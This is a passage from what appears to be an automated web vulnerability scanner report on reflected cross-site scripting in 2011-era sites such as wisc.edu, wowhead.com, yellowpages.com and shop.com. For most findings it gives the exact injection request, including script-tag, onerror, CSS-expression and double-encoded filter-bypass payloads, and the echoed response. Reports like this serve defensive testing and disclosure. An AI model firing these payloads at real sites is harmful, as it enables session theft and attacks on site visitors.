Set-Cookie: WTEINTERSTITIALCOUNTADD=CNPU=/error_404.aspx?404;http://www.whattoexpect.com:80/favicon.icoee44c';15cff5da24b&CNPU1=/error_404.aspx?404;http://www.whattoexpect.com:80/favicon.icoee44c';15cff5da24b; domain=whattoexpect.com; path=/
Set-Cookie: CNCA=-1; domain=whattoexpect.com; path=/
Set-Cookie: CNFIS=F; domain=whattoexpect.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2662


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
<head>
<title>What to Expect</title>
<link rel="STYLESHEET" type="text/css" href="/css/common.css" />
<link
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.whattoexpect.com/favicon.icoee44c';15cff5da24b', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

1.143. http://www.wisc.edu/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wisc.edu
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ad5f"><a>0eafcc39315 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico3ad5f"><a>0eafcc39315 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wisc.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:13:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Content-Length: 19674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
<input type="text" name="q" id="searchInput" value="favicon.ico3ad5f"><a>0eafcc39315" />
...[SNIP]...

1.144. http://www.wisc.edu/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wisc.edu
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 5d918--><script>alert(1)</script>64bc46b88f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico5d918--><script>alert(1)</script>64bc46b88f6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wisc.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:13:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Content-Length: 19742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
<!--(http://www.wisc.edu/favicon.ico5d918--><script>alert(1)</script>64bc46b88f6)-->
...[SNIP]...

1.145. http://www.wisc.edu/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wisc.edu
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac0e7<script>alert(1)</script>34ae1aa9b81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoac0e7<script>alert(1)</script>34ae1aa9b81 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wisc.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:13:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Content-Length: 19733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
<strong>/favicon.icoac0e7<script>alert(1)</script>34ae1aa9b81</strong>
...[SNIP]...

1.146. http://www.wowhead.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wowhead.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8dfe"><script>alert(1)</script>ca989a076a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc8dfe"><script>alert(1)</script>ca989a076a3 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wowhead.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:26:52 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate, max-age=604800
Expires: Thu, 07 Apr 2011 20:26:52 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8434

<!DOCTYPE html>
<html>
<head>

<title>Page Not Found - Wowhead</title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="It appears that the
...[SNIP]...
<body class="favicon_icoc8dfe"><script>alert(1)</script>ca989a076a3">
...[SNIP]...

1.147. http://www.wowhead.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wowhead.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bc06'-alert(1)-'692e4a8f43b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico4bc06'-alert(1)-'692e4a8f43b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wowhead.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:26:53 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate, max-age=604800
Expires: Thu, 07 Apr 2011 20:26:53 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8248

<!DOCTYPE html>
<html>
<head>

<title>Page Not Found - Wowhead</title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="It appears that the
...[SNIP]...
<![CDATA[
var g_pageInfo = { articleUrl: 'favicon.ico4bc06'-alert(1)-'692e4a8f43b', editAccess: 574 };
//]]>
...[SNIP]...

1.148. http://www.yakaz.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yakaz.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4a153<img%20src%3da%20onerror%3dalert(1)>ff635e63587 was submitted in the REST URL parameter 1. This input was echoed as 4a153<img src=a onerror=alert(1)>ff635e63587 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.ico4a153<img%20src%3da%20onerror%3dalert(1)>ff635e63587 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yakaz.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Yakaz Web Server
Date: Thu, 31 Mar 2011 20:46:23 GMT
Content-Length: 94047
Content-Type: text/html; charset=utf-8
Set-Cookie: il=en; expires=Fri, 30-Mar-2012 20:46:23 GMT; path=/; domain=.yakaz.com
Set-Cookie: YSID=516c70030429a50b248c3d6c3a33807c; path=/; domain=.yakaz.com
Set-Cookie: infos=deleted; expires=Wed, 31-Mar-2010 20:46:22 GMT; path=/; domain=.yakaz.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:v="urn:schemas-microsoft-co
...[SNIP]...
<h1>Favicon.ico4a153<img Src=a Onerror=alert(1)>ff635e63587</h1>
...[SNIP]...

1.149. http://www.yellowpages.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.yellowpages.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1be0</script><a>54a64c5c83c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c1be0</script><a>54a64c5c83c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yellowpages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 20:08:22 GMT
Status: 200 OK
Connection: keep-alive
Server: nginx
Content-Type: text/html; charset=utf-8
ETag: "2edaa403410d99c8c55a5d01470a1f6c"
Cache-Control: no-cache
Set-Cookie: search_terms=script%3E%3Ca%3E54a64c5c83c; path=/
Set-Cookie: parity_analytics=---+%0A%3Avisit_id%3A+of23bu7i05q5kbsivzze9qock5cwa%0A%3Avisit_start_time%3A+2011-03-31+20%3A08%3A22.499584+%2B00%3A00%0A%3Alast_page_load%3A+2011-03-31+20%3A08%3A22.499585+%2B00%3A00%0A; path=/; expires=Mon, 31-Mar-2036 20:08:22 GMT
Set-Cookie: vrid=8d994ce0-3e00-012e-9658-00226406a160; domain=.yellowpages.com; path=/; expires=Thu, 31-Mar-2016 20:08:22 GMT
Set-Cookie: _parity_session=BAh7BzoPc2Vzc2lvbl9pZCIlZmQwYWM2MjFkNWVjMDFmMGY0M2IxYTgzYmJiMDBhODQ6E2RleF9zZXNzaW9uX2lkSSIpOGQ5YWNlNjAtM2UwMC0wMTJlLTk2NTktMDAyMjY0MDZhMTYwBjoGRUY%3D--f680e95f133757e540afa87a69c634bf3341dc3d; path=/; HttpOnly
X-Urid: d-8d3656c0-3e00-012e-cfee-00226406a160
Expires: Thu, 31 Mar 2011 20:08:21 GMT
Content-Length: 324151

<!DOCTYPE html>
<html>
<head>

<title>No Location Found - YP.com</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="" name="description" />
<meta content="" n
...[SNIP]...
_gaq.push(['_setAllowAnchor',true]);
_gaq.push(['_setDomainName', ".yellowpages.com"]);
_gaq.push(['_setCustomVar', 1, 'trial_id', "relevancyTest", 1]);

_gaq.push(['_trackPageview','/c1be0</script><a>54a64c5c83c?gasearch=script%3E%3Ca%3E54a64c5c83c']);

(function() {
var s, ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = "http://www.goo
...[SNIP]...

1.150. http://www.yellowpages.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yellowpages.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 18a8f<img%20src%3da%20onerror%3dalert(1)>22617b15004 was submitted in the REST URL parameter 1. This input was echoed as 18a8f<img src=a onerror=alert(1)>22617b15004 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /18a8f<img%20src%3da%20onerror%3dalert(1)>22617b15004 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yellowpages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 20:08:35 GMT
Status: 200 OK
Connection: keep-alive
Server: nginx
Content-Type: text/html; charset=utf-8
X-Runtime: 183
ETag: "52db9b29417d784d52e6bf19f6224561"
Cache-Control: no-cache
Set-Cookie: parity_analytics=---+%0A%3Avisit_id%3A+4gk1vs4wa6i6yquzvgaldz1kw783h%0A%3Avisit_start_time%3A+2011-03-31+20%3A08%3A35.806205+%2B00%3A00%0A%3Alast_page_load%3A+2011-03-31+20%3A08%3A35.806207+%2B00%3A00%0A; path=/; expires=Mon, 31-Mar-2036 20:08:35 GMT
Set-Cookie: vrid=95842cd0-3e00-012e-ad23-00237da1958a; domain=.yellowpages.com; path=/; expires=Thu, 31-Mar-2016 20:08:35 GMT
Set-Cookie: _parity_session=BAh7BzoPc2Vzc2lvbl9pZCIlOWNjMzhhNjU2NGNhMzhhMzIzOGI4NmUxMDllNzQzNTI6E2RleF9zZXNzaW9uX2lkSSIpOTU4NWUzMTAtM2UwMC0wMTJlLWFkMjQtMDAyMzdkYTE5NThhBjoGRUY%3D--81719b78360db1333b0ffb535ae89240b3acdb04; path=/; HttpOnly
X-Urid: d-95815db0-3e00-012e-0257-00237da1958a
Expires: Thu, 31 Mar 2011 20:08:34 GMT
Content-Length: 322976

<!DOCTYPE html>
<html>
<head>

<title>18a8f<Img Src=A Onerror=Alert(1)>22617b15004 - YP.COM</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="18a8f&lt;Img Sr
...[SNIP]...
<h3 class="title">18a8f<Img Src=A Onerror=Alert(1)>22617b15004 Near You</h3>
...[SNIP]...

1.151. http://www.yourdictionary.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yourdictionary.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bb2c"><script>alert(1)</script>1c6fa125c77 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico8bb2c"><script>alert(1)</script>1c6fa125c77 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yourdictionary.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:45:19 GMT
Server: Apache
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=5184000
Expires: Mon, 30 May 2011 20:45:19 GMT
X-LTK-Server: yd-ec2-www
Content-Type: text/html
Content-Length: 8919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://www.yourdictionary.com/favicon.ico8bb2c"><script>alert(1)</script>1c6fa125c77" />
...[SNIP]...

1.152. http://www.eset.com/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11a21"-alert(1)-"3be45c8108 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eset.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=11a21"-alert(1)-"3be45c8108

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=k1j4mf0tb35q4j6drokckq88q7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Mon, 30-May-2011 21:22:34 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25158
Date: Thu, 31 Mar 2011 21:22:34 GMT
X-Varnish: 475695383
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=11a21"-alert(1)-"3be45c8108";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.153. http://www.azstarnet.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.azstarnet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3edd0"style%3d"x%3aexpression(alert(1))"e9e7c857e46 was submitted in the REST URL parameter 1. This input was echoed as 3edd0"style="x:expression(alert(1))"e9e7c857e46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /3edd0"style%3d"x%3aexpression(alert(1))"e9e7c857e46 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.azstarnet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 301 Moved Permanently
Server: WWW
Cache-Control: public, max-age=300
Content-Type: text/html
Date: Thu, 31 Mar 2011 22:03:45 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
Location: http://azstarnet.com/3edd0"style="x:expression(alert(1))"e9e7c857e46/
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: azstarnet.com
Content-Length: 626

<!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head><title>301 Moved Permanently</title></head><body>
<script type='text/javascript' src='http://stats.townnews.com/shared-content/stats/comm
...[SNIP]...
<a href="http://azstarnet.com/3edd0"style="x:expression(alert(1))"e9e7c857e46/">
...[SNIP]...

1.154. http://www.canada.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.canada.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3c84'%3b52a57e4836 was submitted in the REST URL parameter 1. This input was echoed as b3c84';52a57e4836 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b3c84'%3b52a57e4836 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.canada.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www2.canada.com/b3c84';52a57e4836/index.html
Content-Type: text/html; charset=utf-8
Expires: Thu, 31 Mar 2011 20:33:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 31 Mar 2011 20:33:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 3573

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www2.canada.com/b3c84';52a57e4836/index.html">here</a>.</h2>
</body></html>
<form name="frmPage" method="pos
...[SNIP]...
-
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName='/canada/www.canada.com/b3c84';52a57e4836/index.html';
s.server=window.location.hostname.toLowerCase();
s.channel='Canada';
s.pageType='';
s.p
...[SNIP]...

1.155. http://www.searchwarp.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.searchwarp.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d74c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea0866578095 was submitted in the REST URL parameter 1. This input was echoed as 1d74c"><script>alert(1)</script>a0866578095 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico1d74c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea0866578095 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.searchwarp.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Thu, 31 Mar 2011 21:59:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Length: 197
Location: http://SearchWarp.com/favicon.ico1d74c"><script>alert(1)</script>a0866578095
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://SearchWarp.com/favicon.ico1d74c"><script>alert(1)</script>a0866578095">here</a>.</body>

1.156. http://www.searchwarp.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.searchwarp.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4961c"><script>alert(1)</script>13e487883c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?4961c"><script>alert(1)</script>13e487883c7=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.searchwarp.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Thu, 31 Mar 2011 21:59:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Length: 200
Location: http://SearchWarp.com/favicon.ico?4961c"><script>alert(1)</script>13e487883c7=1
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://SearchWarp.com/favicon.ico?4961c"><script>alert(1)</script>13e487883c7=1">here</a>.</body>

1.157. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shop.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload d52ff><script>alert(1)</script>1d2e9c7eb57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?d52ff><script>alert(1)</script>1d2e9c7eb57=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Thu, 31 Mar 2011 20:33:21 GMT
Content-Type: text/html
Content-Length: 349
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?d52ff><script>alert(1)</script>1d2e9c7eb57=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?d52ff><script>alert(1)</script>1d2e9c7eb57=1">
</head>
<body><h1>Object Moved</h1>This docume
...[SNIP]...

1.158. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shop.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4308b"><script>alert(1)</script>a443b43ef30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?4308b"><script>alert(1)</script>a443b43ef30=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shop.com
Accept: */*
Proxy-Connection: Keep-Alive

